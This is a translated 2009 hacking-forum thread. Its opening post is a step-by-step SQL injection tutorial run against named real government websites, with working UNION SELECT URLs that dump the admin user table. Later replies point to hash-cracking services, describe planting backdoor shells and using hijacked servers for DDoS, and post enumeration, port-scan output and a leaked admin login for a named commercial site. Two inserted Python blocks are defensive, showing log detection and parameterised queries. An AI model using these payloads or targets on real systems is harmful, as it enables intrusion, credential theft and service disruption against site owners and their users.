http://idgs.in/195274
  #1

    [dark tutorial] exploiting a site with SQLi

    A while ago someone requested a tutorial on breaking into sites, who was it? ;p Well, here's a short explanation from me.. I took it from a tutorial by my friend at JS, brother p1t4qh ^ ^, but I edited the target a bit. Don't mess up the site once you can do this.. whoever messes it up, I'll mess up your computer later.. I've planted a logger on the site in case anyone dares to deface it.. ok, let's get straight to practice:

    Our target is a site that really has a vulnerability (read: security hole), namely SQL injection. SQL-i also comes in 2 methods: ordinary SQL-i and blind SQL-i.. vulnerabilities on the web aren't only SQL-i, there are all kinds, among others: LFI (Local File Inclusion), RFI (Remote File Inclusion), RCE (Remote Command Execution), and XSS (Cross Site Scripting), not CSS.. that one is for HTML styling.

    SQL (Structured Query Language): just look it up on Google if you're still confused about what it is..

    ok, before I get into the SQL-i steps, there are a few things to note about lamer hackers whose job is defacing: they don't look for targets, they look for vulnerabilities.. if I told one of those hackers who defaces all the time to break into the FBI site, I guarantee he'd shake his head, because he only knows certain vulnerabilities, and FBI sites obviously won't have an SQL injection vulnerability, because this is an old vulnerability and technique. Even though it's an old-school technique, hackers must know it..
    Earlier I told the hacker to break into one site; now I tell him to break into as many sites as possible, any site.. and of course he can do it armed with the vulnerability he knows (say SQL-i). So there really is a difference between an unethical lamer hacker and a very ethical professional hacker; how scary a hacker is can be seen from his ability to recognise a vulnerability and exploit it ^ ^

    ok, let's discuss this one legendary vulnerability

    Below, SQL Injection is presented step by step as implemented on the website http://www.bandung.go.id. Yes, the Bandung city government website, man... it turns out there's an SQL-i vulnerability here. This tutorial is only for learning and knowledge (just to share), and masters who are already experienced are encouraged to give input so the technique becomes more interesting. :mrgreen:

    The key to this exploitation is patience.

    The steps are as follows:
    1. Check by entering a single-quote character ( ' ) and then test with the logical operator ( AND ).
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=9'
    Test result:
    - The page displays an error message
    Code:
    Fatal error: Call to a member function RecordCount() on a non-object in /data1/web/public_html/site/download/qry_download_cat.php on line 6
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=1
    http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=6
    Test result:
    - For the AND+1=1 check the result is TRUE, so the page displays normally.
    - For the AND+1=6 check the result is FALSE, so the page displays an error message (does not run normally); here the page comes out blank.

    2. Check the number of fields in a table. The command used is ORDER+BY+num; increment the variable num. The criterion is: if the field still exists the page runs normally, whereas if the field does not exist the page displays an error message. In this example the last field was found at number 4.
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+order+by+4--
    Why is there a -- at the end of the command? -- is the comment marker in SQL syntax; /* can also be used. As its function implies, we comment out the syntax after the WHERE clause. It happens that in this example there is another SQL command after the WHERE clause, whether ORDER or LIMIT. So the comment marker is used so that that SQL command is not executed, and we get an error message if the field being ORDERed does not exist.

    Compare what happens if the comment marker is not used: even though we do ORDER BY 1 and ORDER BY 100, the page keeps displaying an error message. If that's what happens, how could we find out the number of fields being SELECTed??

    3. Bring out the field numbers in order to display the information we want. The command used is UNION+ALL+SELECT+no_field+no_field+....
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,2,3,4--
    In this example we give the id variable the value null so that the numbers we declare come out; a minus sign can also be used (id=-870). From the numbers printed on the web page, we will extract the MySQL version, the database name and the user name.
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x2B,version(),database(),user()),3,4--
    4. Next we extract the table names with the command UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TABLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE(). Use the clause WHERE TABLE_SCHEMA=DATABASE() so that the tables returned are those of the database in use. If you want to see all tables of all databases, you don't need the WHERE clause. (note: INFORMATION_SCHEMA only exists in MySQL version 5 and above; on version 4 this query cannot be used.)
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
    In the command above, you can replace concat_ws(0x2B,version(),database(),user()) with the number 2 if you don't want to display information about the MySQL version, database name and user name.

    5. Now that we know the table name, next we extract the field names from the table that stores users' UserID and Password. On this website the table in question is tuser. The basic syntax is UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(COLUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='NAMA_TABLE'. If an error occurs, we have to convert the table name to SQL hexadecimal form, giving 0x7475736572.
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x7475736572--
    6. In the last step we extract the records from the tuser table. The command structure is UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMISAH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAMA_TABLE. Run on this example it becomes:
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x3a,userid,pwd),3,4+from+tuser--
    There you go.. you can see the admin username and its password hash.. the rest is just to ***** that hash (decrypt it); you have to know the type first, whether md4, md5, sha1, etc. Sometimes it's not even encrypted, which is really fatal if it isn't encrypted.

    Once you've got the password, then what? Just look for the admin page.. log in and then do whatever you like; you're a super admin now ^^ sorry, I won't tell you where the page is.. just learning

    That concludes the author's presentation of step-by-step SQL Injection on the Bandung city government website. I am not responsible for any negative impact from misuse of this article.. and as for the site I took as the sample, don't ever try to deface it. Please correct me if there are shortcomings or mistakes.

    author: p1t4qh - jasakom mentor & written and edited by: bl00d13z a.k.a b1n4ry_g33k5/c0mrade - jasakom advisor
    Last edited by bl00d13z; 09-05-09 at 15:26.
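Seen from the defending side, the six steps above leave a very recognisable trail in a web server's access log. The following Python is an added example, not code from the thread or from any site it names: it decodes each request's query parameters, tags them with the tutorial step they correspond to (quote probe, AND 1=1 / AND 1=6, ORDER BY n, UNION SELECT, information_schema, hex-encoded names, trailing comment), groups the hits per client address, and shows the hardened handler shape (integer validation plus a bound parameter) that leaves such requests with nothing to inject into. The log lines, addresses and the category table are constructed.

```python
"""Detect the SQLi probing sequence from the tutorial in access logs and
show the hardened query shape. Added example; log lines, addresses and
the category table are constructed placeholders."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines mirroring the request shapes used in steps 1-5.
SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2009:15:26:01 +0700] "GET /?fa=sitedownload.category&id=9 HTTP/1.1" 200 5120
10.0.0.5 - - [09/May/2009:15:26:07 +0700] "GET /?fa=sitedownload.category&id=9' HTTP/1.1" 200 310
10.0.0.5 - - [09/May/2009:15:26:12 +0700] "GET /?fa=sitedownload.category&id=9+and+1=1 HTTP/1.1" 200 5120
10.0.0.5 - - [09/May/2009:15:26:15 +0700] "GET /?fa=sitedownload.category&id=9+and+1=6 HTTP/1.1" 200 87
10.0.0.5 - - [09/May/2009:15:26:40 +0700] "GET /?fa=sitedownload.category&id=9+order+by+4-- HTTP/1.1" 200 5120
10.0.0.5 - - [09/May/2009:15:27:02 +0700] "GET /?fa=sitedownload.category&id=null+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4000
10.0.0.5 - - [09/May/2009:15:27:30 +0700] "GET /?fa=sitedownload.category&id=null+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x7475736572-- HTTP/1.1" 200 3900
10.0.0.9 - - [09/May/2009:15:28:00 +0700] "GET /?fa=sitedownload.category&id=12 HTTP/1.1" 200 5100
"""

# One entry per step of the tutorial, matched against the decoded parameter value.
STAGES = [
    ("error_probe", re.compile(r"'\s*$")),                                    # step 1: trailing quote
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),            # step 1: AND 1=1 / AND 1=6
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),                # step 2: ORDER BY n
    ("union_extract", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),    # steps 3-6
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),  # steps 4-5
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),                 # step 5: hex-encoded name
    ("comment_terminator", re.compile(r"(?:--|/\*)\s*$")),                    # steps 2-6: trailing comment
]


def request_path(line):
    """Pull the request target out of a combined-format log line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)\s+HTTP/', line)
    return m.group(1) if m else None


def classify_value(value):
    """Return the tutorial stages a decoded parameter value matches, in step order."""
    return [name for name, rx in STAGES if rx.search(value)]


def scan_log(text):
    """Decode every query parameter of every request and keep those matching a stage."""
    findings = []
    for line in text.splitlines():
        path = request_path(line)
        if not path:
            continue
        ip = line.split(" ", 1)[0]
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:  # parse_qs already turns '+' into spaces
                stages = classify_value(value)
                if stages:
                    findings.append({"ip": ip, "param": name, "value": value, "stages": stages})
    return findings


def probing_sources(findings, min_stages=2):
    """Group by client: one odd request may be noise, but several distinct
    stages from the same address is the tutorial's sequence being run."""
    per_ip = {}
    for f in findings:
        per_ip.setdefault(f["ip"], set()).update(f["stages"])
    return {ip: sorted(s) for ip, s in per_ip.items() if len(s) >= min_stages}


def demo_db():
    """Constructed stand-in for the site's category table (sqlite in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO category VALUES (?, ?)", [(9, "forms"), (12, "reports")])
    return conn


def lookup_category(conn, raw_id):
    """Hardened handler: accept only a plain integer id and bind it as a
    parameter, so '9 and 1=1' or a UNION payload never becomes SQL text."""
    if not re.fullmatch(r"\d{1,9}", raw_id):
        return None
    row = conn.execute("SELECT name FROM category WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['param']}={f['value']!r} -> {', '.join(f['stages'])}")
    print("probing clients:", probing_sources(found))
    db = demo_db()
    print(lookup_category(db, "9"), lookup_category(db, "9 and 1=1"))
```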

  #2 koker123

    Whoa, scary, there's a logger planted

    Jasakom kid
    wakakakakakakak

  #3

    Quote Originally Posted by koker123:
    Whoa, scary, there's a logger planted

    Jasakom kid
    wakakakakakakak

    Yeah of course.. I couldn't bear to mess up our own nation's site.. unless the admin challenges me.. actually there's a quick way to do SQL-i automatically.. I'll give the tutorial later if people want it; since the tool is source code, it can be a programming lesson too.. in under 2 minutes this SQL-i vulnerable site already gives up the admin username and password.. I'm off to take a shower.. heheh

  #4 Kurt.D.Cobain

    @bl00d13z
    Damn, cool,... anyway bro, your knowledge is dangerous too.... nudge him a bit and he slashes you right away.. ahahahahah
    For Fun
    www.R-L.me

  #5

    Quote Originally Posted by Kurt.D.Cobain:
    @bl00d13z
    Damn, cool,... anyway bro, your knowledge is dangerous too.... nudge him a bit and he slashes you right away.. ahahahahah

    Yikes, slashed >.< .. anyway, here are some sites you can use to learn SQL-i


    I found those about a month ago.. no idea whether they've been patched by now, just test them.. or use these common Google dorks for SQLi:

    Last edited by bl00d13z; 09-05-09 at 21:12.

  #6 koker123

    There are quite a lot of sites to practise on lol

    btw, does the admin of the Bandung site know it's being used for this?
    I'll try that site later (even though I only want to learn)
    and then the admin messes with me in return
    that'd be a hassle for me >.<

    this subforum is getting more and more savage
    wkwkwkwkwk
    Last edited by koker123; 09-05-09 at 17:24.

  #7

    Quote Originally Posted by koker123:
    There are quite a lot of sites to practise on lol

    btw, does the admin of the Bandung site know it's being used for this?
    I'll try that site later (even though I only want to learn)
    and then the admin messes with me in return
    that'd be a hassle for me >.<

    Hehe, the admin does know the site is vulnerable, but never fixes it.. I just see the password seems to keep changing, plus it's a strong password, so cracking it is hard.. my advice is just use the sites I gave, or try learning to search yourself with the Google dorks I gave.. later if you want to ***** an md5 hash (32 bit) go here http://md5cracker.org/ it does multi cracking, the hash is linked to other cracker sites, and if the hash matches in any site's db you get the password right away (usually weak passwords); if you've tried to ***** it there and it doesn't work, only then use your own ***** software.. you have Cain & Abel, right? It can do it; or if you want something light and simple I'll give you the source code later, written in Perl, but only for md5. Happy learning.. if you're confused, just discuss it here again. Actually playing with this stuff is like playing a game, lol.. hunting for web modules that can be injected.. once you've got one, document it.. once you're a pro, usually that server is actually kept: plant a shell for later access through a backdoor; once you're playing with a shell the server can be taken over and made a slave.. one day, if you hate a site, you can call your slaves to take that server down, it ends up as DDoS play:
    Suppose site A has 500 Mbps of bandwidth, and I have 10 slave servers each with 100 Mbps; if I order the slaves to download site A's main page repeatedly (looping), what happens? Site A's bandwidth resource is used up serving my slaves.. so it becomes inaccessible as long as I don't stop the loop.. scary, huh >.<

  #8

    Here I'm adding more vulnerable site paths.. just tried them.. just continue with the SQL queries.. ^ ^ have fun..

    Last edited by bl00d13z; 09-05-09 at 22:39. Reason: updated the list of SQLi-vulnerable sites

  #9 nveuu

    Whoa... this is a game forum... not a security forum...
    kwakwakwkawaw

    seriously savage....
    mercy, master...

    but a little share... my favourite SQLi... hehhe... I once sent it to her as a text message =p

    union all select 1,2,group_concat(hatinya,rasanya,inginya),4,5,6,7 from dia--
    if only you were still vulnerable to me... not to him... >.<"

    sob sob.. makes me sad remembering it again...

    whoooppppsss OOT!!!!

  #10

    Quote Originally Posted by nveuu:
    Whoa... this is a game forum... not a security forum...
    kwakwakwkawaw

    seriously savage....
    mercy, master...

    but a little share... my favourite SQLi... hehhe... I once sent it to her as a text message =p

    union all select 1,2,group_concat(hatinya,rasanya,inginya),4,5,6,7 from dia--
    if only you were still vulnerable to me... not to him... >.<"

    sob sob.. makes me sad remembering it again...

    whoooppppsss OOT!!!!

    awkawkkwakwakwa well, it's still IT.. buahahahah that query is lame, tsk tsk tsk.. savage.. I'm cracking up
    Last edited by bl00d13z; 09-05-09 at 22:24.

  #11 nveuu

    I'm making that my siggy aghhh... ....

    umm... master,,, asking... what about one like this???
    http://www.grenadegloves.com

    http://www.grenadegloves.com/admin/

    how about that one... already got the password ( id : joelumbruso... passw : test ).... already *****ed.... oh well... it doesn't work for me either....
    but I'm kind of confused....
    the admin login is kind of different.... like it uses JS or something....
    do you get it...

    explain, master...
    GRP2 ..

  #12

    Quote Originally Posted by nveuu:
    I'm making that my siggy aghhh... ....

    umm... master,,, asking... what about one like this???
    http://www.grenadegloves.com

    http://www.grenadegloves.com/admin/

    how about that one... already got the password ( id : joelumbruso... passw : test ).... already *****ed.... oh well... it doesn't work for me either....
    but I'm kind of confused....
    the admin login is kind of different.... like it uses JS or something....
    do you get it...

    explain, master...
    GRP2 ..

    Try looking in the other dbs, bro.. I haven't tried dumping yet. There are 5 dbs there, right; if it's from the original db the password really is garbage.
    The db is this:
    Code:
    [+] Gathering MySQL Server Configuration...
    	Database: grenade
    	User: grenade@localhost
    	Version: 5.0.32-Debian_7etch5-log
    [+] Showing all databases current user has access too!
    [+] Number of Databases: 5
    
    [1]grenade
    [2]horde
    [3]mysql
    [4]phpmyadmin_eEs1NuhktKch
    [5]psa
    The tables in the grenade db:
    In the psa db: <here there are lots of columns that could be important clues
    Try searching the other databases too; I haven't tried them all yet. Then, from the domain side, there are 5 domains on his IP:
    Code:
    IP: 72.22.72.202
    IP Country: ip address flag United States
     5 Hosts on this IP
    Number 	Domain / Host 	Functions
    1. 	ww.grenadegloves.com 	[Whois] [Trace] [Visit]
    2. 	www.propaganda-snow.com 	[Whois] [Trace] [Visit]
    3. 	grenadearmy.com 	[Whois] [Trace] [Visit]
    4. 	https: 	[Whois] [Trace] [Visit]
    5. 	www.grenadegloves.com 	[Whois] [Trace] [Visit]
    Well, try getting in from there too, bro; look for the admin page as well. As for the services on that server:
    Code:
    Completed SYN Stealth Scan at 09:08, 22.25s elapsed (1000 total ports)
    Initiating Service scan at 09:08
    Scanning 14 services on vps010-15.vps.securehostserver.com (72.22.72.202)
    Completed Service scan at 09:10, 131.23s elapsed (14 services on 1 host)
    SCRIPT ENGINE: Initiating script scanning.
    Host vps010-15.vps.securehostserver.com (72.22.72.202) appears to be up ... good.
    Interesting ports on vps010-15.vps.securehostserver.com (72.22.72.202):
    Not shown: 981 closed ports
    PORT     STATE    SERVICE      VERSION
    21/tcp   open     ftp          ProFTPD 1.3.1
    22/tcp   open     ssh          OpenSSH 4.3p2 Debian 9 (protocol 2.0)
    25/tcp   open     smtp?
    53/tcp   open     domain       ISC BIND 9.3.4
    80/tcp   open     http         Apache httpd 2.2.3
    106/tcp  open     pop3pw       poppassd
    110/tcp  open     pop3-proxy   AVG pop3 proxy 7.5.510/7.5.557
    135/tcp  filtered msrpc
    139/tcp  filtered netbios-ssn
    143/tcp  open     imap         Courier Imapd (released 2004)
    443/tcp  open     ssl/http     Apache httpd 2.2.3
    445/tcp  filtered microsoft-ds
    465/tcp  open     smtps?
    993/tcp  open     ssl/imap     Courier Imapd (released 2004)
    995/tcp  open     ssl/pop3     Courier pop3d
    1434/tcp filtered ms-sql-m
    1720/tcp filtered H.323/Q.931
    3306/tcp open     mysql        MySQL 5.0.32-Debian_7etch5-log
    8443/tcp open     ssl/http     Apache httpd 2.0.46 ((Red Hat) mod_ssl/2.0.46 OpenSSL/0.9.7a)
    Service Info: Host: localhost.localdomain; OSs: Unix, Linux, Windows
    See, there's a SQL server, and HTTPS on port 8443; try looking for the admin page on the HTTPS one
    https://www.grenadegloves.com:8443/v...plesk/frameset
    But I haven't tried it yet, too much work.. just keep poking at it, bro; when I have some free time I'll try it too.
    Last edited by bl00d13z; 10-05-09 at 10:02.

  14. #13
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    Whoa... so complete!!!
    Thanks, master....

  15. #14

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Update: SQLi vulnerability links, just for learning

    Last edited by bl00d13z; 10-05-09 at 22:16.

  16. #15
    New_Dudutz's Avatar
    Join Date
    Jan 2007
    Location
    Earth~
    Posts
    1,178
    Points
    1,512.50
    Thanks: 0 / 1 / 1

    Default

    Hmm, I don't quite get it, bro bl00d13z,

    for example
    Code:
    UNION+ALL+SELECT+no_field,no_field,CONCAT_WS(PEMISAH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAMA_TABLE
    What is that for, is it SQL code? I'm a bit confused looking for the code that connects one page to another page......... @_@ ......

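    On the question above about what that UNION line is for: the following is an added example, not code from the thread. It builds a constructed stand-in for an article.php?id= page (made-up article and users tables, SQLite instead of MySQL so it runs offline) and places the string-concatenated lookup next to the parameterised one, so the effect of the template and the fix can both be seen.

```python
import sqlite3

# Constructed in-memory stand-in for a PHP/MySQL article page's backend.
# SQLite is used so the example runs offline; table and column names are made up.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE article (id INTEGER, title TEXT);
        CREATE TABLE users (id INTEGER, login TEXT, pw TEXT);
        INSERT INTO article VALUES (1, 'first post');
        INSERT INTO users VALUES (1, 'admin', 'hash-placeholder');
    """)
    return con

def fetch_article_vulnerable(con: sqlite3.Connection, article_id: str) -> list:
    # "Before": the id query-string value is pasted into the SQL text.
    # A value shaped like the thread's template (-1 UNION ALL SELECT ...)
    # turns the one-row lookup into a second SELECT over an unrelated table,
    # and its output is rendered wherever the page prints the title.
    sql = f"SELECT id, title FROM article WHERE id={article_id}"
    return con.execute(sql).fetchall()

def fetch_article_fixed(con: sqlite3.Connection, article_id: str) -> list:
    # "After": the value must be an integer id and is bound as a parameter,
    # so the database never parses it as SQL.
    if not article_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title FROM article WHERE id=?"
    return con.execute(sql, (int(article_id),)).fetchall()

# The template from the post in SQLite syntax: each 'no_field' filler becomes a
# constant so the column count matches, and CONCAT_WS(separator, f1, f2) becomes
# || with a ':' separator (MySQL's CONCAT_WS does the same job).
PAYLOAD = "-1 UNION ALL SELECT 0, login || ':' || pw FROM users"

def demo() -> dict:
    con = build_db()
    leaked = fetch_article_vulnerable(con, PAYLOAD)   # rows from users, not article
    try:
        fetch_article_fixed(con, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True                               # rejected before reaching SQL
    return {"leaked": leaked, "blocked": blocked,
            "normal": fetch_article_fixed(con, "1")}

if __name__ == "__main__":
    print(demo())
```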
